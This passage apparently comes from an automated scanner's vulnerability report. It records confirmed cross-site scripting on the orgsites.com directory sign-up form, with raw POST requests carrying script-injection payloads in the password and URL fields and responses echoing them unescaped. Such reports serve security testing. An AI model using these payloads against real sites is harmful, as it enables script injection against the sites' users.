VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
user POST 3
passwrd1 POST '"--></style></script><script>alert(0x00299C)</script>
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 302
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&user=3&passwrd1='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00299C)%3c%2fscript%3e&passwrd2=3&MAINurl=3&title=3&street=3&city=3&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:54:03 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=\'\"--></style></script><script>netsparker(0x00299C)</script>></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST '"--></style></script><script>alert(0x0029A1)</script>
MAINurl POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 302
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&user=3&passwrd1=3&passwrd2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0029A1)%3c%2fscript%3e&MAINurl=3&title=3&street=3&city=3&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:54:13 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=\'\"--></style></script><script>netsparker(0x0029A1)</script>></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST '"--></style></script><script>alert(0x0029A4)</script>
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 302
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&MAINurl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0029A4)%3c%2fscript%3e&title=3&street=3&city=3&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:54:21 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 